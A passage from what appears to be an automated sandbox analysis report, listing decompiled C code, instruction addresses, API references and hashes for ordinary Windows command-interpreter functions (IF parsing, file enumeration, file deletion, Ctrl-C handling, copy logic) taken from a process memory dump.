									E003582EB(_t144);
								}
								goto L13;
							}
						} else {
							E0033F300(_t66, 0, 0, 0);
							goto L13;
						}
					}
				}
				L78:
			}

0x0033d803
0x0033d812
0x0033d814
0x0033d81c
0x0033d81e
0x0034b9cf
0x0034b9d5
0x0034b9d5
0x0033d826
0x0033d82c
0x0033d830
0x0034b9dd
0x0034b9de
0x0034b9e6
0x0034b9e7
0x0034b9ef
0x0033d836
0x0033d838
0x0033d838
0x0033d83f
0x0033d840
0x0033d847
0x0034b9fa
0x0034b9fe
0x00000000
0x0033d84d
0x0033d84d
0x0033d855
0x0033d871
0x0033d873
0x0033d877
0x0033d857
0x0033d861
0x0033d86b
0x0033d91b
0x00000000
0x00000000
0x00000000
0x0033d86b
0x0033d87e
0x0033d883
0x0033d888
0x0033d921
0x0033d924
0x0033d932
0x0033d932
0x0033d926
0x0033d926
0x0033d894
0x0033d895
0x0033d89a
0x0033d89f
0x0034ba09
0x0034ba09
0x0033d8ac
0x0033d8d7
0x0033d8dc
0x0033d8ae
0x0033d8b0
0x0033d8c0
0x0033d8ca
0x0033d8e2
0x0033d8e5
0x0033d8ea
0x0033d8ec
0x0034ba13
0x0034ba1f
0x0034ba25
0x0034ba26
0x0034ba26
0x0034ba28
0x0033da46
0x0033da46
0x0033da49
0x0033da4b
0x0033da4d
0x00000000
0x00000000
0x0033d9f1
0x0033d9f4
0x0033d9f6
0x0033d9f9
0x0033d9f9
0x0033d9fc
0x0033d9ff
0x0033d9ff
0x0033da08
0x0033da10
0x0033da14
0x0033da19
0x0033da1c
0x0033da1e
0x0033da21
0x0033da23
0x0033da26
0x0033da26
0x0033da29
0x0033da2c
0x0033da2c
0x0033da35
0x0033da36
0x0033da39
0x0033da3b
0x0033da40
0x00000000
0x00000000
0x0033da40
0x0033da39
0x0033da1c
0x0033da4f
0x0033da55
0x0033da5b
0x0033da5e
0x0034ba31
0x0034ba36
0x00000000
0x0033da64
0x0033da66
0x0033da67
0x0033da6c
0x0033da72
0x0033da74
0x0033db8d
0x0033db8f
0x0033da7a
0x0033da80
0x0033da83
0x0033da88
0x0033da8b
0x0033da8d
0x0033da8d
0x0033da90
0x0033da92
0x0033da98
0x0033da98
0x0033da9b
0x0033da9b
0x0033da9e
0x00000000
0x0033daa4
0x0033daa6
0x0033daad
0x0033daaf
0x0034ba90
0x0034ba90
0x00000000
0x0033dab5
0x0033dab7
0x0033dabe
0x0033dac1
0x00000000
0x0033dac7
0x0033dac9
0x0033dace
0x0033dad0
0x0034ba43
0x0034ba48
0x0034ba4a
0x00000000
0x0034ba50
0x0034ba56
0x0034ba5c
0x0034ba5e
0x0034ba64
0x0034ba66
0x00000000
0x0034ba6c
0x0034ba7e
0x0034ba83
0x0034ba84
0x0034ba86
0x00000000
0x0034ba86
0x0034ba66
0x0033dad6
0x0033dad6
0x0033dad6
0x0033dad8
0x0033dadd
0x0033dae0
0x0033dae2
0x0034bb36
0x0034bb3b
0x0034bb3c
0x0034bb3e
0x0034bb43
0x0034bb43
0x0034bb4b
0x0034bb4e
0x00000000
0x0033dae8
0x0033daea
0x0033daef
0x0033daef
0x0033daf2
0x0033daf6
0x0033db6f
0x0033db76
0x0033db7c
0x0033db7f
0x0033db84
0x0033db86
0x00000000
0x0033db88
0x00000000
0x0033db88
0x0033daf8
0x0033daf8
0x0033dafd
0x0033dafe
0x0034ba98
0x0034ba9d
0x0034baa2
0x0034baa8
0x0034baaa
0x00000000
0x0034bab0
0x0034bab5
0x0034baba
0x0034babc
0x00000000
0x0034bac2
0x0034bac2
0x0034bac5
0x0034bac7
0x0034bac9
0x0034bac9
0x0034bad9
0x0034badf
0x0034bae1
0x00000000
0x0034bae7
0x0034bae7
0x0034baea
0x0034baec
0x0034baee
0x0034baee
0x0034baf4
0x0034baf5
0x00000000
0x0034baf5
0x0034bae1
0x0034babc
0x0033db04
0x0033db09
0x0033db11
0x0033db11
0x0033db17
0x0033db17
0x0033db1c
0x0033db22
0x0033db24
0x0034bb89
0x0034bb89
0x0034bb94
0x00000000
0x0033db2a
0x0033db2a
0x0033db2a
0x0033db2c
0x0034baff
0x0034bb03
0x0034bb08
0x0034bb0e
0x0034bb10
0x0034bb15
0x0034bb18
0x0034bb58
0x0034bb58
0x0034bb6f
0x0034bb7c
0x00000000
0x0034bb1a
0x0034bb1a
0x0034bb1c
0x00000000
0x0034bb1c
0x0033db32
0x0033db32
0x0033db32
0x0033db34
0x00000000
0x0033db3a
0x0033db40
0x00000000
0x0033db40
0x0033db34
0x0033db2c
0x0033db24
0x0033dafe
0x0033daf6
0x0033dae2
0x0033dad0
0x0033dac1
0x0033daaf
0x00000000
0x0033db43
0x0033db43
0x0033db46
0x0033db48
0x0033db48
0x0033da9b
0x0033da92
0x0033da74
0x0033db50
0x0033db53
0x0033db5f
0x0033db60
0x0033db61
0x0033db63
0x0033db6c
0x00000000
0x0033db6c
0x0033d8f2
0x0033d8fb
0x0033d8fe
0x0033d905
0x0033d906
0x0033d90b
0x0033d90e
0x0033d910
0x0033d912
0x0033d912
0x00000000
0x0033d910
0x0033d8cc
0x0033d8d2
0x00000000
0x0033d8d2
0x0033d8ca
0x0033d8ac
0x00000000

APIs

_wcsicmp.MSVCRT ref: 0033D814
_wcsicmp.MSVCRT ref: 0033D861
_wcsicmp.MSVCRT ref: 0033D8C0

Strings

ELSE, xrefs: 0033D8BB
IF/?, xrefs: 0033D80D

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsicmp
String ID: ELSE$IF/?
API String ID: 2081463915-1134991328
Opcode ID: 1f25a1820a9bf99c93545d21e8b5e659626500a9d531f0a79bd01642b2c30711
Instruction ID: 96d2740abc24e6a7055fd560ec584f3eafe9276049e2143a6fdcf89c6c6237e5
Opcode Fuzzy Hash: 1f25a1820a9bf99c93545d21e8b5e659626500a9d531f0a79bd01642b2c30711
Instruction Fuzzy Hash: 9161B3356002029BDB379B75EC8576AB3E5AF84360F26456AE40ADF6E1EF71E840CB40

Uniqueness

Uniqueness Score: -1.00%

Function 003468BA, Relevance: 15.1, APIs: 10, Instructions: 114
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E003468BA(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16) {
				signed int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t22;
				void* _t24;
				int _t28;
				void* _t40;
				void* _t41;
				void* _t47;
				void* _t50;
				void* _t51;
				void** _t53;
				void* _t54;
				signed int _t55;

				_t48 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t18 ^ _t55;
				_v12 = __ecx;
				_t40 = 0;
				_t22 = FindFirstFileExW(__edx, 0 | _a8 == 0x00000000, _a12, 0, 0, 2);
				_t53 = _a16;
				_t50 = _t22;
				 *_t53 = _t50;
				while(_t50 != 0xffffffff) {
					_push(_a4);
					_push(_a12);
					if(_v12 != E00346A00) {
						 *0x3794b4();
						_t28 =  *_v12();
						_t50 =  *_t53;
					} else {
						_t28 = E00346A00();
					}
					if(_t28 == 0) {
						if(FindNextFileW(_t50, _a12) == 0) {
							FindClose( *_t53);
							 *_t53 =  *_t53 | 0xffffffff;
							_t50 = _t50 | 0xffffffff;
							goto L6;
						} else {
							_t50 =  *_t53;
							continue;
						}
					} else {
						 *0x373cf0 =  *0x373cf0 & 0x00000000;
						_t40 = 1;
						L6:
						if(_t50 == 0xffffffff) {
							L12:
							if(_t40 == 0) {
								break;
							}
							L13:
							_t24 = _t40;
						} else {
							_t47 =  *0x373cf4;
							if(_t47 == 0) {
								_t47 = HeapAlloc(GetProcessHeap(), 0, 0x14);
								goto L17;
							} else {
								_t48 =  *0x35d5dc; // 0x0
								if(_t48 >=  *0x373cf8) {
									_t47 = HeapReAlloc(GetProcessHeap(), 0, _t47, 4 + _t48 * 4);
									if(_t47 == 0) {
										 *0x373cf0 = GetLastError();
										FindClose( *_t53);
										 *_t53 =  *_t53 | 0xffffffff;
										_t24 = 0;
									} else {
										 *0x373cf8 =  *0x373cf8 + 1;
										L17:
										_t48 =  *0x35d5dc; // 0x0
										 *0x373cf4 = _t47;
										goto L9;
									}
								} else {
									L9:
									if(_t47 != 0) {
										 *(_t47 + _t48 * 4) =  *_t53;
										 *0x35d5dc = _t48;
									}
									_t40 = 1;
									goto L12;
								}
							}
						}
					}
					_pop(_t51);
					_pop(_t54);
					_pop(_t41);
					return E00346FD0(_t24, _t41, _v8 ^ _t55, _t48, _t51, _t54);
				}
				 *0x373cf0 = GetLastError();
				goto L13;
			}

0x003468ba
0x003468bf
0x003468c0
0x003468c1
0x003468c8
0x003468d4
0x003468dc
0x003468e6
0x003468ec
0x003468ef
0x003468f1
0x003468f3
0x003468f8
0x003468fe
0x00346906
0x0034699a
0x003469a3
0x003469a5
0x0034690c
0x0034690c
0x0034690c
0x00346913
0x003469e2
0x003469ed
0x003469f3
0x003469f6
0x00000000
0x003469e4
0x003469e4
0x00000000
0x003469e4
0x00346919
0x00346919
0x00346920
0x00346922
0x00346925
0x00346951
0x00346953
0x00000000
0x00000000
0x00346955
0x00346955
0x00346927
0x00346927
0x0034692f
0x00346988
0x00000000
0x00346931
0x00346931
0x0034693d
0x003469c4
0x003469c8
0x0035154f
0x00351554
0x0035155a
0x0035155d
0x003469ce
0x003469ce
0x0034698a
0x0034698a
0x00346990
0x00000000
0x00346990
0x0034693f
0x0034693f
0x00346941
0x00346945
0x00346949
0x00346949
0x0034694f
0x00000000
0x0034694f
0x0034693d
0x0034692f
0x00346925
0x0034695a
0x0034695b
0x0034695e
0x00346967
0x00346967
0x00346970
0x00000000

APIs

FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,00346A00,00346A00,?,0033AE4F,00000037,00000000,?), ref: 003468E6
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,0033AE4F,00000037,00000000,?,?), ref: 0034696A
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,0033AE4F,00000037,00000000,?,?), ref: 0034697B
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033AE4F,00000037,00000000,?,?), ref: 00346982
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,0033AE4F,00000037,00000000,?,?), ref: 003469B7
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0033AE4F,00000037,00000000,?,?), ref: 003469BE
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000037,?,0033AE4F,00000037,00000000,?,?), ref: 003469DA
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(0033AE4F,?,0033AE4F,00000037,00000000,?,?), ref: 003469ED

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$Find$AllocFileProcess$CloseErrorFirstLastNext
String ID:
API String ID: 1047556133-0
Opcode ID: 05ccc37be1956757444c2102e4e2c57265e42fade850e0931e95b90e6ee43e48
Instruction ID: 161932c7245d39bd903ee6f3d393fb5ad3180ddd44591573584af74db72947f7
Opcode Fuzzy Hash: 05ccc37be1956757444c2102e4e2c57265e42fade850e0931e95b90e6ee43e48
Instruction Fuzzy Hash: 1041D631200202EFDB279F24DC0AB697BEDFB4A321F100619E996DB2E4DB70A941DF11

Uniqueness

Uniqueness Score: -1.00%

Function 003383F2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E003383F2(WCHAR* __ecx, signed int __edx) {
				void* _v8;
				void* _v16;
				void* _v24;
				long _v32;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _v64;
				struct _EXCEPTION_RECORD _t30;
				long _t31;
				long _t35;
				WCHAR* _t41;
				char* _t43;
				long _t47;
				void* _t49;

				_t47 = 0;
				_t41 = __ecx;
				if((__edx & 0x00000400) != 0) {
					L11:
					if(DeleteFileW(_t41) == 0) {
						_t47 = GetLastError();
					}
					L8:
					return _t47;
				}
				_v8 = _v8 | 0xffffffff;
				_t30 =  &_v16;
				__imp__RtlDosPathNameToRelativeNtPathName_U_WithStatus(__ecx, _t30, 0,  &_v40);
				if(_t30 < 0) {
					goto L11;
				}
				if(_v40 > 0) {
					_t31 = _v32;
					_t43 =  &_v40;
				} else {
					_t31 = 0;
					_t43 =  &_v16;
					_v32 = 0;
				}
				_v60 = _t31;
				_v64 = 0x18;
				_v52 = 0x40;
				_v56 = _t43;
				_v48 = _t47;
				_v44 = _t47;
				_t35 = NtOpenFile( &_v8, 0x10000,  &_v64,  &_v24, 4, 0x5040);
				__imp__RtlReleaseRelativeName( &_v40);
				RtlFreeUnicodeString( &_v16);
				if(_t35 < 0) {
					goto L11;
				} else {
					if(E003384BE(_v8) != 0) {
						_t49 = E00359AB4(_v8);
					} else {
						_t49 = 1;
					}
					CloseHandle(_v8);
					if(_t49 == 0) {
						goto L11;
					} else {
						goto L8;
					}
				}
			}

0x003383fd
0x003383ff
0x00338407
0x0035036d
0x00350376
0x00350382
0x00350382
0x003384b5
0x003384bd
0x003384bd
0x0033840d
0x00338416
0x0033841b
0x00338423
0x00000000
0x00000000
0x0033842d
0x00350353
0x00350356
0x00338433
0x00338433
0x00338435
0x00338438
0x00338438
0x00338440
0x0033844c
0x0033845c
0x00338464
0x00338467
0x0033846a
0x0033846d
0x00338479
0x00338483
0x0033848b
0x00000000
0x00338491
0x0033849b
0x00350366
0x003384a1
0x003384a3
0x003384a3
0x003384a7
0x003384af
0x00000000
0x00000000
0x00000000
0x00000000
0x003384af

APIs

RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 0033841B
NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 0033846D
RtlReleaseRelativeName.NTDLL(?), ref: 00338479
RtlFreeUnicodeString.NTDLL(?), ref: 00338483

Part of subcall function 003384BE: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 003384EA

CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 003384A7
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000001), ref: 0035036E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00338393), ref: 0035037C

Strings

@, xrefs: 0033845C

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
String ID: @
API String ID: 2968197161-2766056989
Opcode ID: 76a87db4c1b98a23ff32a009a25b69c6dfa690c6644c3eef0e63e4330a2988f0
Instruction ID: fbb3eeac4ec3db9f5e47aa799eb4a1209c7e5f25728a5d9f519cff888d52c983
Opcode Fuzzy Hash: 76a87db4c1b98a23ff32a009a25b69c6dfa690c6644c3eef0e63e4330a2988f0
Instruction Fuzzy Hash: C6218075E00219AFCB26DFA6DC84EEEBBBCEB44711F104156F915E3250EB319E058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00356D90, Relevance: 13.6, APIs: 9, Instructions: 67
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00356D90(void* __edi, intOrPtr _a4) {
				char _v12;
				void* __ecx;
				int _t4;
				void* _t6;
				void* _t7;
				struct _IO_FILE* _t10;
				void* _t13;
				void* _t16;

				_t16 = __edi;
				_push(_t13);
				_push(_t13);
				if(_a4 == 0 || _a4 == 1) {
					EnterCriticalSection( *0x363858);
					 *0x35d544 = 1;
					LeaveCriticalSection( *0x363858);
					if( *0x35d0db != 0 &&  *0x373cc4 != 0) {
						_push("^C");
						_t10 = E00347721(_t4, 2);
						_pop(_t13);
						_t4 = fflush(E00347721(fprintf(_t10, ??), 2));
					}
					if( *0x36b938 != 0xffffffff) {
						__imp__TryAcquireSRWLockExclusive(0x377f20, _t16);
						if(_t4 != 0) {
							__imp__NtCancelSynchronousIoFile( *0x36b938, 0,  &_v12);
							__imp__ReleaseSRWLockExclusive(0x377f20);
						}
					}
					if(E00347797(_t13) == 0) {
						_t7 = E00340178(_t5);
						if(_t7 != 0) {
							__imp___get_osfhandle(0);
							FlushConsoleInputBuffer(_t7);
						}
					}
					_t6 = 1;
				} else {
					_t6 = 0;
				}
				return _t6;
			}

0x00356d90
0x00356d95
0x00356d96
0x00356d9f
0x00356db3
0x00356dbf
0x00356dc5
0x00356dd2
0x00356ddd
0x00356de4
0x00356de9
0x00356df9
0x00356dff
0x00356e09
0x00356e12
0x00356e1a
0x00356e28
0x00356e2f
0x00356e2f
0x00356e35
0x00356e3d
0x00356e41
0x00356e48
0x00356e4c
0x00356e54
0x00356e54
0x00356e48
0x00356e5a
0x00356da6
0x00356da6
0x00356da6
0x00356e60

APIs

EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00356DB3
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00356DC5
fprintf.MSVCRT ref: 00356DEB
fflush.MSVCRT ref: 00356DF9
TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20), ref: 00356E12
NtCancelSynchronousIoFile.NTDLL ref: 00356E28
ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20), ref: 00356E2F
_get_osfhandle.MSVCRT ref: 00356E4C
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00356E54

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
String ID:
API String ID: 3139166086-0
Opcode ID: 3f70b094bd52404499707b65f6c4ce0c94ac811d6b293134ce97fecd5763d091
Instruction ID: 8ba06da5b97ea1bf6f522324804af4d0bdc52de4c3aa32d5c6daf98734af41df
Opcode Fuzzy Hash: 3f70b094bd52404499707b65f6c4ce0c94ac811d6b293134ce97fecd5763d091
Instruction Fuzzy Hash: D611B135201204BBDB336B64EC4FBAA7BACEB05723F44451AFD099A1B1CB705885CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00345FC8, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00345FC8(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, WCHAR* _a12, signed int _a16, intOrPtr* _a20, intOrPtr* _a24) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				intOrPtr _v552;
				int _v556;
				intOrPtr* _v560;
				WCHAR* _v564;
				intOrPtr* _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t84;
				short _t95;
				short _t97;
				void* _t98;
				intOrPtr _t100;
				signed int _t112;
				signed int _t113;
				long _t118;
				signed int _t120;
				void* _t121;
				short _t122;
				signed char _t124;
				void* _t125;
				long _t126;
				void* _t127;
				short _t128;
				long _t136;
				signed short* _t137;
				short _t146;
				short _t147;
				void* _t148;
				signed int _t150;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				short _t156;
				signed int _t161;
				WCHAR* _t162;
				intOrPtr* _t163;
				short* _t169;
				long _t170;
				short* _t171;
				signed int _t177;
				short _t178;
				WCHAR* _t182;
				WCHAR* _t183;
				signed int _t187;
				WCHAR* _t188;
				WCHAR* _t199;
				short* _t202;
				void* _t205;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				long _t219;
				signed int _t220;
				void* _t222;
				void* _t223;
				short _t227;
				void* _t228;
				WCHAR* _t229;
				void* _t232;
				WCHAR* _t233;
				signed int _t235;
				intOrPtr* _t239;
				short* _t241;
				void* _t242;
				WCHAR* _t244;
				signed int _t246;
				short* _t248;
				WCHAR* _t250;
				signed int _t251;
				signed int _t252;
				WCHAR* _t254;
				void* _t258;
				intOrPtr _t259;
				signed int _t260;

				_t84 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t84 ^ _t260;
				_v552 = _a4;
				_v564 = _a12;
				_v560 = _a20;
				_t232 = __edx;
				_v568 = _a24;
				E003462FA(E00343320(L"COPYCMD"), _t232);
				_v556 = 0;
				_t162 = E0033EA40( *((intOrPtr*)(__ecx + 0x3c)), 0, 0);
				if(E003462FA(_t162, _t232) == 0) {
					L2:
					_t250 = _t162;
					_t217 = 0;
					_t12 =  &(_t250[1]); // 0x0
					_t169 = _t12;
					do {
						_t95 =  *_t250;
						_t250 =  &(_t250[1]);
					} while (_t95 != 0);
					_t251 = _t250 - _t169;
					_t252 = _t251 >> 1;
					if(_t251 == 0) {
						L46:
						_t170 = 0x232a;
						L48:
						E00355CEA(_t162, _t170, _t217, __eflags);
						L49:
						_t170 = 0x232e;
						goto L48;
					}
					if(_t252 >= 0x7fe7) {
						goto L49;
					}
					_t233 = _t162;
					_t13 =  &(_t233[1]); // 0x0
					_t171 = _t13;
					do {
						_t97 =  *_t233;
						_t233 =  &(_t233[1]);
					} while (_t97 != 0);
					_t235 = _t233 - _t171 >> 1;
					_t98 = E003422C0(_t162, _t162);
					_t14 = _t235 + 1; // -3
					_t217 = _t14;
					E00341040(_t162, _t14, _t98);
					_t100 = E00343B5D(_t162, _t14);
					 *_v560 = _t100;
					if(_t100 == 1) {
						_t170 =  *0x373cf0;
						goto L48;
					}
					_v24 = 1;
					_v28 = 0;
					_v20 = 0x104;
					memset( &_v548, 0, 0x104);
					if(E00340C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
						_t170 = 0x2374;
						goto L48;
					}
					_t254 =  &(_t162[_t252 + 1]);
					if( *_t254 == 0) {
						_t177 = _v28;
						__eflags = _t177;
						if(_t177 == 0) {
							_t177 =  &_v548;
						}
						 *_t177 =  *((intOrPtr*)( *0x373cec));
						_t112 = _v28;
						__eflags = _t112;
						if(_t112 == 0) {
							_t112 =  &_v548;
						}
						_t178 = 0x3a;
						 *((short*)(_t112 + 2)) = _t178;
						_t113 = _v28;
						__eflags = _t113;
						if(_t113 == 0) {
							_t113 =  &_v548;
						}
						 *((short*)(_t113 + 4)) = 0;
						L19:
						_t238 = _a8;
						_t217 = _a8;
						_t255 = _v552;
						if(E00342D22(_v552, _t238, _t162) != 0) {
							goto L49;
						}
						_t163 = _v560;
						if(( *( *( *_t163 + 0x18)) & 0x00000010) == 0) {
							_t222 = 0x5c;
							_t258 = E00342349(_t255, _t222);
							if(_t258 == 0) {
								_t259 = _v552;
							} else {
								_t259 = _t258 + 2;
							}
							_t223 = 0x5c;
							if(E00342349( *((intOrPtr*)( *_t163 + 0x10)), _t223) == 0) {
								_t139 =  *((intOrPtr*)( *_t163 + 0x10));
							}
							E00341040(_t259, _t238 - (_t259 - _v552 >> 1), _t139);
						}
						_t117 = _v28;
						if(_v28 == 0) {
							_t117 =  &_v548;
						}
						_t162 = _v564;
						_t217 = _a16;
						_t118 = E00342D22(_t162, _a16, _t117);
						if(_t118 != 0) {
							goto L49;
						} else {
							_t256 = _t118;
							 *0x373cf0 = _t118;
							SetLastError(_t118);
							_t239 = _v568;
							_t182 = _t162;
							 *_t239 = 0;
							_t120 =  *_t162 & 0x0000ffff;
							_t217 = _t120;
							if(_t120 == 0) {
								L32:
								_t121 = 0x5c;
								if(_t217 == _t121) {
									_t183 = _t162;
									_t256 = 1;
									__eflags = 1;
									_t217 =  &(_t183[1]);
									do {
										_t122 =  *_t183;
										_t183 =  &(_t183[1]);
										__eflags = _t122 - _v556;
									} while (_t122 != _v556);
									 *((short*)(_t162 + (_t183 - _t217 >> 1) * 2 - 2)) = 0;
								}
								_t124 = GetFileAttributesW(_t162);
								if(_t124 != 0xffffffff) {
									__eflags = _t124 & 0x00000010;
									if((_t124 & 0x00000010) != 0) {
										 *_t239 = 1;
										_t256 = 1;
									}
									L36:
									if(_t256 != 0) {
										_t125 = 0x5c;
										_t126 = E00342349(_v552, _t125);
										_t256 = _t126;
										__eflags = 0;
										_t219 = _t126;
										_t49 = _t219 + 2; // 0x2
										_t127 = _t49;
										do {
											_t187 =  *_t219;
											_t219 = _t219 + 2;
											__eflags = _t187;
										} while (_t187 != 0);
										_t188 = _t162;
										_t220 = _t219 - _t127;
										__eflags = _t220;
										_t217 = _t220 >> 1;
										_t241 =  &(_t188[1]);
										do {
											_t128 =  *_t188;
											_t188 =  &(_t188[1]);
											__eflags = _t128 - _v556;
										} while (_t128 != _v556);
										_t52 = _t217 + 1; // -1
										__eflags = _t52 + (_t188 - _t241 >> 1) - 0x7fe7;
										if(__eflags > 0) {
											goto L49;
										}
										_t217 = _a16;
										E003418C0(_t162, _a16, _t256);
									}
									__imp__??_V@YAXPAX@Z(_v28);
									_pop(_t242);
									return E00346FD0(0, _t162, _v8 ^ _t260, _t217, _t242, _t256);
								}
								_t136 = GetLastError();
								 *0x373cf0 = _t136;
								if(_t136 == 0 || _t136 == 2) {
									goto L36;
								} else {
									__eflags = _t136 - 3;
									if(__eflags == 0) {
										goto L36;
									}
									_t170 = _t136;
									goto L48;
								}
							}
							do {
								_t137 = _t182;
								_t182 =  &(_t182[1]);
							} while ( *_t182 != 0);
							_t217 =  *_t137 & 0x0000ffff;
							goto L32;
						}
					}
					_t199 = _t254;
					if( *((intOrPtr*)(E0033D7E6(_t199))) != 0) {
						goto L46;
					}
					_t217 =  &(_t199[1]);
					do {
						_t146 =  *_t199;
						_t199 =  &(_t199[1]);
					} while (_t146 != 0);
					if(_t199 - _t217 >> 1 > 0x7fe7) {
						goto L49;
					}
					_t244 = _t254;
					_t27 =  &(_t244[1]); // -1
					_t202 = _t27;
					do {
						_t147 =  *_t244;
						_t244 =  &(_t244[1]);
					} while (_t147 != 0);
					_t246 = _t244 - _t202 >> 1;
					_t148 = E003422C0(_t162, _t254);
					_t28 = _t246 + 1; // -4
					E00341040(_t254, _t28, _t148);
					_t150 = _t254[1] & 0x0000ffff;
					_t227 = 0x3a;
					if(_t150 != _t227) {
						_t205 = 0x5c;
						__eflags =  *_t254 - _t205;
						if( *_t254 != _t205) {
							L61:
							_t206 = _v28;
							__eflags = _t206;
							if(_t206 == 0) {
								_t206 =  &_v548;
							}
							 *_t206 =  *((intOrPtr*)( *0x373cec));
							_t153 = _v28;
							__eflags = _t153;
							if(_t153 == 0) {
								_t153 =  &_v548;
							}
							 *((short*)(_t153 + 2)) = _t227;
							_t154 = _v28;
							__eflags = _t154;
							if(_t154 == 0) {
								_t154 =  &_v548;
							}
							 *((short*)(_t154 + 4)) = 0;
							_t208 = _v28;
							__eflags = _t208;
							if(_t208 == 0) {
								_t208 =  &_v548;
							}
							_t228 = _t208 + 2;
							__eflags = 0;
							do {
								_t155 =  *_t208;
								_t208 = _t208 + 2;
								__eflags = _t155;
							} while (_t155 != 0);
							_t209 = _t208 - _t228;
							__eflags = _t209;
							_t229 = _t254;
							_t210 = _t209 >> 1;
							_t73 =  &(_t229[1]); // 0x1
							_t248 = _t73;
							do {
								_t156 =  *_t229;
								_t229 =  &(_t229[1]);
								__eflags = _t156 - _v556;
							} while (_t156 != _v556);
							_t217 = _t229 - _t248 >> 1;
							__eflags = _t210 + 1 + (_t229 - _t248 >> 1) - 0x7fe7;
							if(__eflags > 0) {
								goto L49;
							}
							E00340CF2(_t217, _t254);
							goto L19;
						}
						__eflags = _t150 - _t205;
						if(_t150 == _t205) {
							goto L18;
						}
						goto L61;
					}
					L18:
					E00340D89(_t227, _t254);
					goto L19;
				} else {
					goto L1;
				}
				do {
					L1:
					_t161 =  *_t162 & 0x0000ffff;
					_t162 =  &(_t162[1]);
				} while (_t161 != 0);
				goto L2;
			}

0x00345fd3
0x00345fda
0x00345fe0
0x00345fea
0x00345ff6
0x00346005
0x00346007
0x00346016
0x00346023
0x0034602e
0x0034603b
0x00346048
0x00346048
0x0034604a
0x0034604c
0x0034604c
0x0034604f
0x0034604f
0x00346052
0x00346055
0x0034605a
0x0034605c
0x0034605e
0x0034f576
0x0034f576
0x0034f57f
0x0034f57f
0x0034f584
0x0034f584
0x00000000
0x0034f584
0x0034606a
0x00000000
0x00000000
0x00346070
0x00346072
0x00346072
0x00346075
0x00346075
0x00346078
0x0034607b
0x00346084
0x00346086
0x0034608c
0x0034608c
0x00346091
0x00346098
0x003460a3
0x003460a8
0x0034f58b
0x00000000
0x0034f58b
0x003460b0
0x003460b9
0x003460c4
0x003460c8
0x003460ee
0x0034f593
0x00000000
0x0034f593
0x003460f7
0x003460fd
0x0034f59a
